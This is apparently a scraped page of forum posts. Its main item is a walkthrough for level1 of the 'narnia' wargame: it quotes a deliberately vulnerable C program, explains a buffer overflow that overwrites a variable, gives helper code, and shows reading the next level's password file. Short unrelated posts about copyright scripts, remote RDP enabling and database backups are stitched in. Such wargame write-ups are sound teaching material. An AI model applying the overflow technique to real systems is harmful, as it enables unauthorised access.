Sports trivia, history, and interesting tidbits to please and apease both the sports enthuisiast and the hardcore participant!
mixedmartialarts.thetazzone.com/

22 of 2,320,000

The Nature Zone: Pristine, enlightening, relaxing nature, a nice …

The Animal Den · The Space Zone · The Marine Zone · The Cat Zone · The Dog Zone … I think everyone likes cool nature pictures, it brings back the basic …
www.nature.thetazzone.com/

This is related to the wargames Harry posted…
It is for the server narnia. http://www.intruded.net/narnia.html
The objective on this box is to look at the source code to the program for the level you are on, and find a way to exploit or accomplish what it asks.

This is my solution and explanation of level1.

Once you login:
cd /wargame

The program you are trying to use is level1, the source code is level1.c

Code:
int main(){
long val=0×41414141;
char buf[20];

printf(”Correct val’s value from 0×41414141 -> 0xdeadbeef!\n”);
printf(”Here is your chance: “);
scanf(”%24s”,&buf);

printf(”buf: %s\n”,buf);
printf(”val: 0x%08x\n”,val);

if(val==0xdeadbeef){
seteuid(1002);
system(”/bin/sh”);
} else {
printf(”WAY OFF!!!!\n”);
exit(1);
}

return 0;
}

Looking at this code, they want you to change vals value from 0×41414141 to 0xdeadbeef.
Also if you notice, it prompts you for input and stores it into the variable buf. And then prints out val…
The variable buf is declared as an array with 20 elements, and since there is nothing checking the size of the input, it allows for a buffer overflow.

You can play around with this by entering inputs of varying lengths.
You should notice that anything less than 20 characters does not effect the value of val, but if you input something more than 20 characters, the value of val changes.

This is how you are going to accomplish changing the value to 0xdeadbeef.

You can figure out how what you enter effects the value by entering in 000000000000000000000 (21 0’s).
Your output becomes 0×41410030
By inputting 20 0’s followed by a single different character you can see how the value changes.
Closer inspection shows that the last two digits is the ascii value of the key you entered.

So basically what you have to do is enter in 20 0’s, and then whatever makes ascii values you need…
If you look at an ascii table, these are not standard letters on your keyboard… Some of them aren’t even documented.

So what I did was wrote a C++ program to print out each character for me…
Code:
#include
using namespace std;

int main(int argc, char* argv[])
{
unsigned long target = 0xdeadbeef;
char *p = (char *) ⌖
for (int i = 0; i < 4; i++) {
cout << p[i];
}
return 0;
}

This program will print out the characters you need to use after the 20 0’s in order to pass the level and replace val with 0xdeadbeef.

In order to get the 4 characters we need, we use a char pointer. A char is stored as 1 byte in memory. 0xdeadbeef is 4 stored as 4 consecutive bytes.
We need the char pointer to point to the first byte of 0xdeadbeef.
This is done by setting our pointer equal to the address of target…
Code:
char *p = &target;

However, the compiler does not like that because target is a long integer, not a character.
So we must type cast the address of target to that of a char
[code] char *p = (char *) &target;
Now, p points to the beginning of target… we know that it is 4 bytes long, so we need to print 4 characters.
C++ will let you use a pointer as an array, each next element of the array increases the address it points to by the size of the pointer.
In the case of a char pointer, it increments by 1 byte each time.

So following the for loop we will print p[0], p[1], p[2], p[3].
Those are the 4 characters needed in the first program to set val equal to 0xdeadbeef.

In order to run the program you can do this:
Copy the code
type this: cat > /tmp/lvl1.cpp
Paste the code
Press cntrl D
type this: g++ -o /tmp/lvl1 /tmp/lvl1.cpp
chmod +x /tmp/lvl1
/tmp/lvl1

Now copy the 4 characters

then run /wargame/level1
type in 20 0’s, and paste those characters.

Now you should have a new shell as level2
cat /home/level2/.passwd

Continue on to level2

Good luck!

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network

I wrote some code a few years back, basically it was channel services for IRC. It has about 96 .c files that are compiled into a single binary. Each file contains copyright info at the top, so rather than edit each file one at a time to modify the copyright each year, I wrote a script to do it for me.

Of course you can modify it to suit your need to edit other type files. The key being each file contains “some string”

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network.

Here’s a pair of commands that will enable RDP on a remote workstation. The caveat is you have to run PowerShell.exe using your administrative credentials. You can use the –credential option on the first command, but not on the second (which is a drag).

This only works for Windows XP (and 2000), not for Vista. Which isn’t to say you can’t do the same for Vista, but since the security on RDP 6.0 is different, it’s a little more involved. I’ll dig it up and post it sometime…

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network.

How many servers do you have running applications that make use of MSDE 2000? You know you should be backing up the database files, but you can’t quite justify the extra cost of a SQL agent for your backup software. I’ve come across the situation more than once. Did you know you can use an OSQL command from the command line to create a backup of the database while it’s mounted and running? This command will create a .bak file that you can backup using a regular backup agent, no SQL agent required. I wrote a script that would run the command, and then simply used the Windows Task Scheduler to run the script once a day. The .bak file is overwritten each time, and our Backup Exec server maintains the archival copies. Here’s the script:

Bear in mind that line 8, the line beginning with “strOSQL”, is one command on one line. If you want your script to wrap for readability, break up the command where you see fit.

You’ll also want to adjust the backup path defined in the OSQL command, ‘X:\<filename>’ in the example, to fit your server/network as well. If you want to back it up to a networked drive, make sure the drive is already mapped locally, I haven’t tested this using a UNC path.

Enjoy.